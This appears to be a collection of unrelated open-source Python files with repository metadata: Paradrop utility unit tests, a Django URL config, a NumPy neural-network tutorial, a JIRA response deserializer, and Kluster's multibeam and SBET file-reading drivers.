'internalIntf': "eth0",
'netType': "wan",
'externalIpaddr': "192.168.1.1"
}]
chute.setCache("networkInterfaces", ifaces)
assert addresses.getInternalIntfList(chute) == ["eth0"]
assert addresses.getGatewayIntf(chute) == ("192.168.1.1", "eth0")
assert addresses.getWANIntf(chute) == ifaces[0]
def test_pdos():
"""
Test pdos utility module
"""
assert pdos.getMountCmd() == "mount"
assert pdos.isMount("/")
assert pdos.ismount("/")
assert pdos.oscall("true") is None
assert pdos.oscall("false") is not None
assert pdos.oscall("echo hello") is None
assert pdos.oscall("echo hello 1>&2") is None
# Make a file, check that our functions respond correctly to it
path = writeTempFile("hello")
assert pdos.fixpath(path) == path
assert "text" in pdos.getFileType(path)
assert pdos.exists(path)
assert not pdos.isdir(path)
assert pdos.isfile(path)
# Remove the file, check that our functions detect that
pdos.unlink(path)
assert pdos.fixpath(path) == path
assert pdos.getFileType(path) is None
assert not pdos.exists(path)
assert not pdos.isdir(path)
assert not pdos.isfile(path)
# Make a directory there instead
pdos.mkdir(path)
assert pdos.fixpath(path) == path
assert "directory" in pdos.getFileType(path)
assert pdos.exists(path)
assert pdos.isdir(path)
assert not pdos.isfile(path)
# Now we will do some manipulations on files under that directory
a = os.path.join(path, "a")
b = os.path.join(path, "b")
c = os.path.join(path, "c")
d = os.path.join(path, "d")
pdos.write(a, "hello")
assert pdos.isfile(a)
pdos.copy(a, b)
assert pdos.isfile(b)
pdos.symlink(a, c)
assert pdos.isfile(c)
pdos.move(a, b)
assert not pdos.isfile(a)
pdos.remove(b)
assert not pdos.isfile(b)
pdos.mkdir(a)
pdos.copytree(a, b)
assert pdos.isdir(b)
# Remove a non-empty directory
pdos.remove(path)
assert not pdos.isdir(path)
# This file is under a directory that no longer exists, so the write must
# fail.
#
# TODO: These should not fail silently. They should either return an error
# indicator or raise an exception.
pdos.writeFile(a, "c")
pdos.write(a, "c")
# Test various ways to call writeFile
pdos.writeFile(path, ["a", "b"])
pdos.writeFile(path, "c")
pdos.writeFile(path, 5) # This one does nothing.
# Test the content with readFile
data = pdos.readFile(path, array=False, delimiter="")
assert data == "abc"
data = pdos.readFile(path, array=True)
assert data == ["a", "b", "c"]
pdos.remove(path)
assert pdos.readFile(path) is None
def test_pdosq():
"""
Test pdosq utility functions
"""
# Test makedirs with an already-exists error, returns False.
with patch('os.makedirs', side_effect=OSError(errno.EEXIST, "error")):
assert pdosq.makedirs("/") is False
# Test makedirs with a permission error, passes on the Exception.
with patch('os.makedirs', side_effect=OSError(errno.EPERM, "error")):
assert_raises(OSError, pdosq.makedirs, "/")
def test_storage():
"""
Test PDStorage class
"""
temp = tempfile.mkdtemp()
filename = os.path.join(temp, "storage")
storage = PDStorage(filename, 0)
# PDStorage needs to be subclassed; the base class always returns not
# saveable.
assert storage.attrSaveable() is False
storage = TestStorage(filename)
data = {"key": "value"}
with open(filename, "w") as output:
output.write("BAD CONTENTS")
# The first attempt to read it will fail and try to delete the file. We
# will cause the unlink to fail on the first try and let it succeed on the
# second try.
with patch("paradrop.lib.utils.pdos.unlink", side_effect=Exception("Boom!")):
storage.loadFromDisk()
assert os.path.exists(filename)
storage.loadFromDisk()
assert not os.path.exists(filename)
# The first write will fail because we have not provided data yet.
storage.saveToDisk()
assert not os.path.exists(filename)
# Now we will save some data and verify that we can reload it.
storage.setAttr(data)
# Cause the save to fail on the first try, then let it succeed.
with patch("paradrop.lib.utils.pdos.open", side_effect=Exception("Boom!")):
storage.saveToDisk()
storage.saveToDisk()
assert os.path.exists(filename)
storage.setAttr(None)
storage.loadFromDisk()
assert storage.getAttr() == data
# Clean up
pdos.remove(temp)
def test_uci():
"""
Test UCI file utility module
"""
from paradrop.lib.utils import uci
from paradrop.base import settings
# Test functions for finding path to UCI files
settings.loadSettings(mode="unittest")
assert uci.getSystemConfigDir() == "/tmp/.paradrop-test/uci/config.d/"
assert uci.getSystemPath("network") == "/tmp/.paradrop-test/uci/config.d/network"
# Test stringify function
assert uci.stringify("a") == "a"
blob = {"a": "b"}
assert uci.stringify(blob) == blob
blob = {"a": {"b": "c"}}
assert uci.stringify(blob) == blob
blob = {"a": ["b", "c"]}
assert uci.stringify(blob) == blob
blob = {"a": 5}
strblob = {"a": "5"}
assert uci.stringify(blob) == strblob
assert uci.isMatch(blob, strblob)
# Write a realistic configuration and load with uci module
path = writeTempFile(NETWORK_WAN_CONFIG)
config = uci.UCIConfig(path)
# Test if it found the config section that we know should be there
empty = {}
assert config.getConfig(empty) == []
match = {"type": "interface", "name": "wan", "comment": "__PARADROP__"}
assert len(config.getConfig(match)) == 1
match = {"type": "interface", "name": "wan", "comment": "chute"}
assert config.getConfig(match) == []
assert config.getConfigIgnoreComments(empty) == []
assert len(config.getConfigIgnoreComments(match)) == 1
# More existence tests
assert not config.existsConfig(empty, empty)
match_config = {
"type": "interface",
"name": "wan",
"comment": "__PARADROP__"
}
match_options = {
"ifname": "eth0",
"proto": "dhcp"
}
assert config.existsConfig(match_config, match_options)
# Test adding and removing
config.delConfigs([(match_config, match_options)])
assert not config.existsConfig(match_config, match_options)
config.addConfigs([(match_config, match_options)])
assert config.existsConfig(match_config, match_options)
config.delConfig(match_config, match_options)
assert not config.existsConfig(match_config, match_options)
config.addConfig(match_config, match_options)
assert config.existsConfig(match_config, match_options)
# Get configuration by chute name
assert config.getChuteConfigs("none") == []
assert len(config.getChuteConfigs("__PARADROP__")) == 1
# Test saving and reloading
config.save(backupToken="backup")
config2 = uci.UCIConfig(path)
# Simple test for the equality operators
assert config == config2
assert not (config != config2)
# Test chuteConfigsMatch function
assert not uci.chuteConfigsMatch(config.getChuteConfigs("__PARADROP__"),
config2.getChuteConfigs("none"))
assert uci.chuteConfigsMatch(config.getChuteConfigs("__PARADROP__"),
config2.getChuteConfigs("__PARADROP__"))
# Further test the equality operators
config2.filepath = "NOMATCH"
assert not (config == config2)
assert config != config2
config2.filepath = config.filepath
config2.myname = "NOMATCH"
assert not (config == config2)
assert config != config2
config2.myname = config.myname
config2.config = []
assert not (config == config2)
assert config != config2
def test_uci_getLineParts():
"""
Test the UCI getLineParts utility function
"""
from paradrop.lib.utils import uci
line = "config interface wan"
result = uci.getLineParts(line)
assert result == line.split()
# It should eat the apostrophes and give same result.
line2 = "config 'interface' 'wan'"
result2 = uci.getLineParts(line)
assert result2 == result
line = "option key '<PASSWORD>'"
result = uci.getLineParts(line)
assert result == ["option", "key", "<PASSWORD>"]
line = "config interface 'oops"
result = uci.getLineParts(line)
assert result == ["config", "interface", "oops"]
| 2.171875 | 2 |
products/urls.py | okosamastar/nisshin_b2b | 0 | 12796832 | from django.urls import path
from . import views
# from django.views.generic import RedirectView
urlpatterns = [
path("", views.CategoriesView.as_view(), name="products.category"),
# path("detail/", RedirectView.as_view(url="/b2b/products/")),
path("detail/<slug:slug>", views.ProductDetail.as_view(), name="products.detail"),
path("<str:cat>/", views.ProductsView.as_view(), name="products.products"),
path(
"<str:cat>/<str:child>", views.ProductsView.as_view(), name="products.products"
),
path("<str:cat>/<str:tag>/", views.ProductsView.as_view(), name="products.tags"),
]
| 1.921875 | 2 |
lesson5/utils.py | BaiduOSS/PaddleTutorial | 33 | 12796833 | <reponame>BaiduOSS/PaddleTutorial<filename>lesson5/utils.py
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Authors: <NAME>(<EMAIL>)
Date: 2017/11/17 17:27:06
"""
import h5py
import matplotlib.pyplot as plt
import numpy as np
def initialize_parameters(layer):
"""
初始化参数
Args:
layer:各层所包含的节点数
Return:
parameters:参数,包括w和b
"""
np.random.seed(2)
parameters = {}
# 随机初始化参数w,b初始化为0
for i in range(len(layer) - 1):
parameters['w' + str(i)] = np.random.randn(
layer[i + 1], layer[i]) / np.sqrt(layer[i])
parameters['b' + str(i)] = np.random.randn(layer[i + 1], 1) * 0
return parameters
def forward_calculate(X, parameters):
"""
前向计算
Args:
X: features
parameters: 参数w和b
Return:
A: 包含输入和各层输出值
Z: 包含隐藏层和输出层的中间值
"""
A = []
A.append(X)
Z = []
length = int(len(parameters) / 2)
# 计算隐藏层
for i in range(length - 1):
# 加权、偏移
z = np.dot(parameters['w' + str(i)], A[i]) + parameters['b' + str(i)]
Z.append(z)
# 激活
a = np.maximum(0, z)
A.append(a)
# 计算输出层
z = np.dot(parameters['w' + str(length - 1)], A[length - 1]) \
+ parameters['b' + str(length - 1)]
Z.append(z)
a = 1. / (1 + np.exp(-z))
A.append(a)
return A, Z
def calculate_cost(A, Y):
"""
计算Cost
Args:
A: 存储输入值和各层输出值
Y: 真实值
Return:
cost: 成本cost
"""
m = Y.shape[1] # 样本个数
Y_out = A[len(A) - 1] # 取模型输出值
# 计算成本
probability = np.multiply(
np.log(Y_out), Y) + np.multiply(np.log(1 - Y_out), 1 - Y)
cost = -1. / m * np.sum(probability)
cost = np.squeeze(cost) # 确保维度的正确性
return cost
def update_parameters(p, dp, learning_rate):
"""
更新参数
Args:
p: 参数
dp: 该参数的梯度
learning_rate: 学习步长
Return:
更新后的参数
"""
return p - learning_rate * dp
def backward_calculate(A, Z, parameters, Y, learning_rate):
"""
后向计算
Args:
A: 存储输入值和各层输出值
Z: 存储各层中间值
parameters: 参数包括w,b
Y: 标签
learning_rate: 学习步长
Return:
parameters: 更新后的参数
"""
m = A[0].shape[1]
length = int(len(parameters) / 2)
# 反向计算:计算输出层
da = - (np.divide(Y, A[length]) - np.divide(1 - Y, 1 - A[length]))
dz = A[length] - Y
# 反向计算:计算隐藏层
for i in range(1, length):
da = np.dot(parameters['w' + str(length - i)].T, dz)
dz = da
dz[Z[length - i - 1] <= 0] = 0
# 更新参数
dw = 1. / m * np.dot(dz, A[length - i - 1].T)
db = 1. / m * np.sum(dz, axis=1, keepdims=True)
parameters['w' + str(length - i - 1)] = update_parameters(
parameters['w' + str(length - i - 1)], dw, learning_rate)
parameters['b' + str(length - i - 1)] = update_parameters(
parameters['b' + str(length - i - 1)], db, learning_rate)
return parameters
def plot_costs(costs, learning_rate):
"""
把cost图形化输出
Args:
costs: 训练迭代过程中的cost
learning_rate: 学习步长
Return:
"""
plt.plot(costs)
plt.ylabel('cost')
plt.xlabel('Iterations (per hundreds)')
plt.title("learning rate =" + str(learning_rate))
plt.show()
plt.savefig('costs.png')
def deep_neural_network(X, Y, layer, iteration_nums, learning_rate=0.0075):
"""
深层神经网络模型计算(包含前向计算和后向计算)
Args:
X: 输入值
Y: 真实值
layer: 各层大小
iteration_nums: 迭代次数
learning_rate: 学习率
Return:
parameters: 模型训练所得参数,用于预测
"""
# np.random.seed(1)
costs = []
# 参数初始化
parameters = initialize_parameters(layer)
# 训练
for i in range(0, iteration_nums):
# 正向计算
A, Z = forward_calculate(X, parameters)
# 计算成本函数
Cost = calculate_cost(A, Y)
# 反向计算并更新参数
parameters = backward_calculate(A, Z, parameters, Y, learning_rate)
# 每100次训练打印一次成本函数
if i % 100 == 0:
print "Cost after iteration %i: %f" % (i, Cost)
costs.append(Cost)
# plot_costs(costs, learning_rate)
return parameters
def calc_accuracy(predictions, Y):
"""
准确率计算
Args:
predictions: 预测结果
Y: 标签即label
Return:
accuracy: 计算准确率
"""
Y = np.squeeze(Y)
right = 0
for i in range(len(predictions)):
if predictions[i] == Y[i]:
right += 1
accuracy = (right / float(len(predictions))) * 100
return accuracy
def predict_image(parameters, X, Y):
"""
使用模型进行预测来预测图片是否为猫(1 cat or 0 non-cat)
Args:
parameters: 包含权值和偏移量
X: 数据,形状为(px_num * px_num * 3, number of examples)
Y: 标签
Return:
accuracy: 准确率
"""
# m为数据个数
m = X.shape[1]
A = []
A.append(X)
Z = []
predictions = []
# 预测结果,即前向传播过程
A, Z = forward_calculate(X, parameters)
# 取输出值Y_out,即A的最后一组数
Y_out = A[len(A) - 1]
# 将连续值Y_out转化为二分类结果0或1
for i in range(m):
if Y_out[0, i] >= 0.5:
predictions.append(1)
elif Y_out[0, i] < 0.5:
predictions.append(0)
return calc_accuracy(predictions, Y)
def load_data_sets():
"""
用于从两个.h5文件中分别加载训练数据和测试数据
Args:
Return:
train_x_ori: 原始训练数据集
train_y: 原始训练数据标签
test_x_ori: 原始测试数据集
test_y: 原始测试数据标签
classes(cat/non-cat): 分类list
"""
train_data = h5py.File('datasets/train_images.h5', "r")
# train images features
train_x_ori = np.array(train_data["train_set_x"][:])
# train images labels
train_y_ori = np.array(train_data["train_set_y"][:])
test_data = h5py.File('datasets/test_images.h5', "r")
# test images features
test_x_ori = np.array(test_data["test_set_x"][:])
# test images labels
test_y_ori = np.array(test_data["test_set_y"][:])
# the list of classes
classes = np.array(test_data["list_classes"][:])
train_y_ori = train_y_ori.reshape((1, train_y_ori.shape[0]))
test_y_ori = test_y_ori.reshape((1, test_y_ori.shape[0]))
result = [train_x_ori, train_y_ori, test_x_ori,
test_y_ori, classes]
return result
| 3.109375 | 3 |
jiraclient/_deserialize.py | rcoenmans/jira-client | 2 | 12796834 | # -----------------------------------------------------------------------------
# The MIT License (MIT)
# Copyright (c) 2018 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# -----------------------------------------------------------------------------
from .models import (
Project,
Board,
Issue,
Sprint,
Attachment,
User,
Comment,
Epic,
Worklog,
Component
)
def _parse_json_to_class(response, result_class, attrs):
values = []
for value in response['values']:
values.append(_map_attrs_values(result_class, attrs, value))
return values
def _get_attr_value(attr, values, default=None):
if attr in values:
return values[attr]
else:
return default
def _map_attrs_values(result_class, attrs, values):
result = result_class()
for attr in attrs:
if attr in values:
setattr(result, attr, _get_attr_value(attr, values))
return result
def _parse_json_to_issues(response):
issues = []
for issue in response['issues']:
issues.append(_parse_json_to_issue(issue))
return issues
def _parse_json_to_issue(response):
issue = Issue()
issue.id = _get_attr_value('id', response)
issue.key = _get_attr_value('key', response)
issue.summary = _get_attr_value('summary', response['fields'])
issue.description = _get_attr_value('description', response['fields'])
issue.labels = _get_attr_value('labels', response['fields'], [])
issue.type = response['fields']['issuetype']['name']
issue.status = response['fields']['status']['name']
issue.created = response['fields']['created']
issue.updated = response['fields']['updated']
issue.creator = User()
issue.creator.name = response['fields']['creator']['name']
issue.creator.email = response['fields']['creator']['emailAddress']
issue.creator.display = response['fields']['creator']['displayName']
issue.reporter = User()
issue.reporter.name = response['fields']['reporter']['name']
issue.reporter.email = response['fields']['reporter']['emailAddress']
issue.reporter.display = response['fields']['reporter']['displayName']
if response['fields']['priority']:
issue.priority = response['fields']['priority']['name']
if response['fields']['assignee']:
issue.assignee = User()
issue.assignee.name = response['fields']['assignee']['name']
issue.assignee.email = response['fields']['assignee']['emailAddress']
issue.assignee.display = response['fields']['assignee']['displayName']
if 'project' in response['fields']:
if response['fields']['project']:
issue.project = _parse_json_to_project(response['fields']['project'])
if 'epic' in response['fields']:
if response['fields']['epic']:
issue.epic = _parse_json_to_epic(response['fields']['epic'])
if 'closedSprints' in response['fields']:
for resp in response['fields']['closedSprints']:
issue.closed_sprints.append(_parse_json_to_sprint(resp))
if 'sprint' in response['fields']:
if response['fields']['sprint']:
issue.sprint = _parse_json_to_sprint(response['fields']['sprint'])
if 'comment' in response['fields']:
for resp in response['fields']['comment']['comments']:
issue.comments.append(_parse_json_to_comment(resp))
if 'attachment' in response['fields']:
for resp in response['fields']['attachment']:
issue.attachments.append(_parse_json_to_attachement(resp))
if 'worklog' in response['fields']:
for resp in response['fields']['worklog']['worklogs']:
issue.worklog.append(_parse_json_to_worklog(resp))
if 'components' in response['fields']:
for resp in response['fields']['components']:
issue.components.append(_parse_json_to_component(resp))
for key, value in response['fields'].items():
if key.startswith('customfield_'):
issue.custom[key] = value
return issue
def _parse_json_to_sprints(response):
sprints = []
for value in response['values']:
sprints.append(_parse_json_to_sprint(value))
return sprints
def _parse_json_to_sprint(response):
sprint = Sprint()
sprint.id = _get_attr_value('id', response)
sprint.state = _get_attr_value('state', response)
sprint.name = _get_attr_value('name', response)
sprint.goal = _get_attr_value('goal', response)
sprint.board_id = _get_attr_value('originBoardId', response)
sprint.start_date = _get_attr_value('startDate', response)
sprint.end_date = _get_attr_value('endDate', response)
sprint.complete_date = _get_attr_value('completeDate', response)
return sprint
def _parse_json_to_board(response):
attrs = ['id', 'name', 'type', 'location']
return _map_attrs_values(Board, attrs, response)
def _parse_json_to_epic(response):
attrs = ['id', 'name', 'key', 'summary', 'done']
return _map_attrs_values(Epic, attrs, response)
def _parse_json_to_project(response):
attrs = ['id', 'key', 'name']
return _map_attrs_values(Project, attrs, response)
def _parse_json_to_attachement(response):
attachment = Attachment()
attachment.id = response['id']
attachment.filename = response['filename']
attachment.created = response['created']
attachment.size = response['size']
attachment.mime = response['mimeType']
attachment.content = response['content']
attachment.author = User()
attachment.author.name = response['author']['name']
attachment.author.email = response['author']['emailAddress']
attachment.author.display = response['author']['displayName']
return attachment
def _parse_json_to_comment(response):
comment = Comment()
comment.id = response['id']
comment.body = response['body']
comment.created = response['created']
comment.updated = response['updated']
comment.author = User()
comment.author.name = response['author']['name']
comment.author.email = response['author']['emailAddress']
comment.author.display = response['author']['displayName']
return comment
def _parse_json_to_worklog(response):
worklog = Worklog()
worklog.id = response['id']
worklog.issue_id = response['issueId']
worklog.updated = response['updated']
worklog.comment = response['comment']
worklog.author = User()
worklog.author.name = response['author']['name']
worklog.author.display = response['author']['displayName']
return worklog
def _parse_json_to_component(response):
attrs = ['id', 'name', 'description']
return _map_attrs_values(Component, attrs, response) | 1.398438 | 1 |
models/__init__.py | danielism97/ST-MFNet | 5 | 12796835 | <gh_stars>1-10
from .stmfnet import STMFNet | 1.078125 | 1 |
HSTB/kluster/fqpr_drivers.py | davesteps/kluster | 0 | 12796836 | <reponame>davesteps/kluster<filename>HSTB/kluster/fqpr_drivers.py<gh_stars>0
"""
fqpr_drivers = holding place for all the file level access methods that are contained in the HSTB.drivers repository.
Makes adding a new multibeam format a little easier, as if you have a new driver that can be included in all the relevant
functions here, (and you add the format to kluster_variables supported_XXXXXX list) it will work in Kluster.
"""
import os
import numpy as np
from HSTB.kluster import kluster_variables
from HSTB.drivers import kmall, par3, sbet, svp, PCSio
sonar_reference_point = {'.all': ['tx_x', 'tx_y', 'tx_z'],
'.kmall': ['tx_x', 'tx_y', 'tx_z']}
def _check_multibeam_file(multibeam_file: str):
fileext = os.path.splitext(multibeam_file)[1]
if fileext not in kluster_variables.supported_multibeam:
raise NotImplementedError('fqpr_drivers: File ({}) is not a Kluster supported multibeam file ({})'.format(multibeam_file, kluster_variables.supported_multibeam))
def _check_sbet_file(sbet_file: str):
fileext = os.path.splitext(sbet_file)[1]
if fileext not in kluster_variables.supported_ppnav:
raise NotImplementedError('fqpr_drivers: File ({}) is not a Kluster supported post processed navigation (SBET) file ({})'.format(sbet_file, kluster_variables.supported_ppnav))
def _check_pos_file(pos_file: str):
fileext = os.path.splitext(pos_file)[1]
try:
int(fileext[1]), int(fileext[2]), int(fileext[3])
except:
raise NotImplementedError('fqpr_drivers: File ({}) is not a Kluster supported position (POS) file (.000 -> .999)'.format(pos_file))
def _check_export_log_file(log_file: str):
fileext = os.path.splitext(log_file)[1]
if fileext not in kluster_variables.supported_ppnav_log:
raise NotImplementedError('fqpr_drivers: File ({}) is not a Kluster supported export log file ({})'.format(log_file, kluster_variables.supported_ppnav_log))
def _check_svp_file(svp_file: str):
fileext = os.path.splitext(svp_file)[1]
if fileext not in kluster_variables.supported_sv:
raise NotImplementedError('fqpr_drivers: File ({}) is not a Kluster supported sound velocity file ({})'.format(svp_file, kluster_variables.supported_sv))
def fast_read_multibeam_metadata(multibeam_file: str, gather_times: bool = True, gather_serialnumber: bool = True):
"""
Return metadata from a multibeam file using the fast read methods. Fast read methods allow getting small amounts of
data without reading the entire file. These include: the start and end time of the file in utc seconds, the serial
number(s) of the multibeam sonar in the file. Use gather_times and gather_serialnumber to select which/both of these options.
Multibeam file must be one of the multibeam files that we support in Kluster, see kluster_variables.supported_multibeam
Parameters
----------
multibeam_file
multibeam file
gather_times
if True, returns the start and end time of the file
gather_serialnumber
if True, returns the serial number(s) of the multibeam sonar in the file
Returns
-------
str
the type of multibeam file discovered, i.e. 'kongsberg_all'
list
[UTC start time in seconds, UTC end time in seconds] or None if gather_times is False
list
[serialnumber: int, secondaryserialnumber: int, sonarmodelnumber: str] or None if gather_serialnumber is False
"""
_check_multibeam_file(multibeam_file)
fileext = os.path.splitext(multibeam_file)[1]
if fileext == '.all':
mtype = 'kongsberg_all'
aread = par3.AllRead(multibeam_file)
if gather_times:
start_end = aread.fast_read_start_end_time()
else:
start_end = None
if gather_serialnumber:
serialnums = aread.fast_read_serial_number()
else:
serialnums = None
aread.close()
elif fileext == '.kmall':
mtype = 'kongsberg_kmall'
km = kmall.kmall(multibeam_file)
if gather_times:
start_end = km.fast_read_start_end_time()
else:
start_end = None
if gather_serialnumber:
serialnums = km.fast_read_serial_number()
else:
serialnums = None
km.closeFile()
else:
raise NotImplementedError('fqpr_drivers: {} is supported by kluster, but not currently supported by fast_read_multibeam_metadata'.format(multibeam_file))
return mtype, start_end, serialnums
def return_xyz_from_multibeam(multibeam_file: str):
"""
Return the already sound velocity corrected data that is in the multibeam file. We use this to compare with Kluster
data in a couple functions.
Parameters
----------
multibeam_file
multibeam file of interest
Returns
-------
np.ndarray
one dimensional array of acrosstrack for the soundings
np.ndarray
one dimensional array of alongtrack for the soundings
np.ndarray
one dimensional array of depth offsets for the soundings
np.ndarray
one dimensional array of utc timestamps for the soundings
np.ndarray
one dimensional array of ping counters for the soundings
"""
_check_multibeam_file(multibeam_file)
mbes_extension = os.path.splitext(multibeam_file)[1]
if mbes_extension == '.all':
print('Reading from xyz88/.all file with par Allread...')
x, y, z, times, counters = _xyz_from_allfile(multibeam_file)
elif mbes_extension == '.kmall':
print('Reading from MRZ/.kmall file with kmall reader...')
x, y, z, times, counters = _xyz_from_kmallfile(multibeam_file)
else:
raise NotImplementedError('fqpr_drivers: {} is supported by kluster, but not currently supported by return_xyz_from_multibeam'.format(multibeam_file))
return x, y, z, times, counters
def sequential_read_multibeam(multibeam_file: str, start_pointer: int = 0, end_pointer: int = 0, first_installation_rec: bool = False):
"""
Run the sequential read function built in to all multibeam drivers in Kluster. Sequential read takes a multibeam file
(with an optional start/end pointer in bytes) and reads all the datagrams of interest sequentially, skipping any that
are not in the required datagram lookups.
Parameters
----------
multibeam_file
multibeam file of interest
start_pointer
the start pointer that we start the read at
end_pointer
the end pointer where we finish the read
first_installation_rec
if True, will just read the installation parameters entry and finish
Returns
-------
dict
nested dictionary object containing all the numpy arrays for the data of interest
"""
_check_multibeam_file(multibeam_file)
multibeam_extension = os.path.splitext(multibeam_file)[1]
if multibeam_extension == '.all':
ar = par3.AllRead(multibeam_file, start_ptr=start_pointer, end_ptr=end_pointer)
recs = ar.sequential_read_records(first_installation_rec=first_installation_rec)
ar.close()
elif multibeam_extension == '.kmall':
km = kmall.kmall(multibeam_file)
# kmall doesnt have ping-wise serial number in header, we have to provide it from install params
serial_translator = km.fast_read_serial_number_translator()
recs = km.sequential_read_records(start_ptr=start_pointer, end_ptr=end_pointer, first_installation_rec=first_installation_rec,
serial_translator=serial_translator)
km.closeFile()
else:
raise NotImplementedError('fqpr_drivers: {} is supported by kluster, but not currently supported by sequential_read_multibeam'.format(multibeam_file))
return recs
def read_first_fifty_records(file_object):
if isinstance(file_object, par3.AllRead):
par3.print_some_records(file_object, recordnum=50)
elif isinstance(file_object, kmall.kmall):
kmall.print_some_records(file_object, recordnum=50)
elif isinstance(file_object, PCSio.PCSBaseFile):
PCSio.print_some_records(file_object, recordnum=50)
elif isinstance(file_object, np.ndarray):
sbet.print_some_records(file_object, recordnum=50)
else:
print(f'read_first_fifty_records: Unsupported file object: {file_object}')
def kluster_read_test(file_object):
if isinstance(file_object, par3.AllRead):
par3.kluster_read_test(file_object, byte_count=-1)
else:
print(f'read_first_fifty_records: Unsupported file object: {file_object}')
def return_xarray_from_sbet(sbetfiles: list, smrmsgfiles: list = None, logfiles: list = None, weekstart_year: int = None,
weekstart_week: int = None, override_datum: str = None, override_grid: str = None,
override_zone: str = None, override_ellipsoid: str = None):
"""
Read all the provided nav files, error files and concatenate the result in to a single xarray dataset.
Parameters
----------
sbetfiles
list of full file paths to the sbet files
smrmsgfiles
list of full file paths to the smrmsg files
logfiles
list of full file paths to the sbet export log files
weekstart_year
if you aren't providing a logfile, must provide the year of the sbet here
weekstart_week
if you aren't providing a logfile, must provide the week of the sbet here
override_datum
provide a string datum identifier if you want to override what is read from the log or you don't have a log, ex: 'NAD83 (2011)'
override_grid
provide a string grid identifier if you want to override what is read from the log or you don't have a log, ex: 'Universal Transverse Mercator'
override_zone
provide a string zone identifier if you want to override what is read from the log or you don't have a log, ex: 'UTM North 20 (66W to 60W)'
override_ellipsoid
provide a string ellipsoid identifier if you want to override what is read from the log or you don't have a log, ex: 'GRS80'
Returns
-------
xarray Dataset
data and attribution from the sbets relevant to our survey processing
"""
[_check_sbet_file(fil) for fil in sbetfiles]
if smrmsgfiles is not None:
[_check_sbet_file(fil) for fil in smrmsgfiles]
if logfiles is not None:
[_check_export_log_file(fil) for fil in logfiles]
return sbet.sbets_to_xarray(sbetfiles, smrmsgfiles, logfiles, weekstart_year, weekstart_week, override_datum,
override_grid, override_zone, override_ellipsoid)
def return_xarray_from_posfiles(posfiles: list, weekstart_year: int, weekstart_week: int):
"""
Read all the provided pos files, error files and concatenate the result in to a single xarray dataset.
Parameters
----------
posfiles
list of full file paths to the pos files
weekstart_year
must provide the year of the posfiles here
weekstart_week
must provide the gpsweek of the posfiles here
Returns
-------
xarray Dataset
data and attribution from the posfiles relevant to our survey processing
"""
[_check_pos_file(fil) for fil in posfiles]
return PCSio.posfiles_to_xarray(posfiles, weekstart_year, weekstart_week)
def return_offsets_from_posfile(posfile: str):
"""
Translate the MSG20 message in the POS File to xyzrph like sensor names. Use this to populate an existing
xyzrph record built by kluster to get the POSMV imu/antenna related sensors.
Parameters
----------
posfile
path to a posmv file
Returns
-------
dict
dictionary of offset/angle names to values found in the MSG20 message
"""
_check_pos_file(posfile)
pcs = PCSio.PCSFile(posfile, nCache=0)
try:
pcs.CacheHeaders(read_first_msg=(20, '$MSG'))
msg20 = pcs.GetArray("$MSG", 20)
data = {'tx_to_antenna_x': round(msg20[0][10], 3), 'tx_to_antenna_y': round(msg20[0][11], 3),
'tx_to_antenna_z': round(msg20[0][12], 3),
'imu_h': round(msg20[0][21], 3), 'imu_p': round(msg20[0][20], 3), 'imu_r': round(msg20[0][19], 3),
'imu_x': round(msg20[0][7], 3), 'imu_y': round(msg20[0][8], 3), 'imu_z': round(msg20[0][9], 3)}
return data
except KeyError:
try:
print('Unable to read from {}: message 20 not found'.format(posfile))
print('Found {}'.format(list(pcs.sensorHeaders.keys())))
except:
print('Unable to read from file: {}'.format(posfile))
return None
def fast_read_sbet_metadata(sbet_file: str):
"""
Determine the start and end time of the provided sbet file by reading the first and last record.
Parameters
----------
sbet_file
full file path to a sbet file
Returns
-------
list
list of floats, [start time, end time] for the sbet
"""
_check_sbet_file(sbet_file)
tms = sbet.sbet_fast_read_start_end_time(sbet_file)
return tms
def fast_read_errorfile_metadata(smrmsg_file: str):
"""
Determine the start and end time of the provided smrmsg file by reading the first and last record.
Parameters
----------
smrmsg_file
full file path to a smrmsg file
Returns
-------
list
list of floats, [start time, end time] for the smrmsg file
"""
_check_sbet_file(smrmsg_file)
tms = sbet.smrmsg_fast_read_start_end_time(smrmsg_file)
return tms
def read_pospac_export_log(exportlog_file: str):
"""
Read the POSPac export log to get the relevant attributes for the exported SBET. SBET basically has no metadata,
so this log file it generates is the only way to figure it out. Log file is plain text, looks something like this:
--------------------------------------------------------------------------------
EXPORT Data Export Utility [Jun 18 2018]
Copyright (c) 1997-2018 Applanix Corporation. All rights reserved.
Date : 09/09/18 Time : 17:01:12
--------------------------------------------------------------------------------
Mission date : 9/9/2018
Input file : S:\\2018\\...sbet_H13131_251_2702.out
Output file : S:\\2018\\...export_H13131_251_2702.out
Output Rate Type : Specified Time Interval
Time Interval : 0.020
Start time : 0.000
End time : 999999.000
UTC offset : 18.000
Lat/Lon units : Radians
Height : Ellipsoidal
Grid : Universal Transverse Mercator
Zone : UTM North 01 (180W to 174W)
Datum : NAD83 (2011)
Ellipsoid : GRS 1980
Transformation type : 14 Parameter
Target epoch : 2018.687671
--------------------------------------------------------------------------------
Processing completed.
Parameters
----------
exportlog_file: str, file path to the log file
Returns
-------
attrs: dict, relevant data from the log file as a dictionary
"""
_check_export_log_file(exportlog_file)
loginfo = sbet.get_export_info_from_log(exportlog_file)
return loginfo
def is_sbet(sbet_file: str):
"""
Check if the file is an sbet. Ideally we just rely on the checking if the file contains an even number of 17 doubles,
but add in the time check just in case.
Parameters
----------
sbet_file
file path to a POSPac sbet file
Returns
-------
bool
True if file is an sbet, False if not
"""
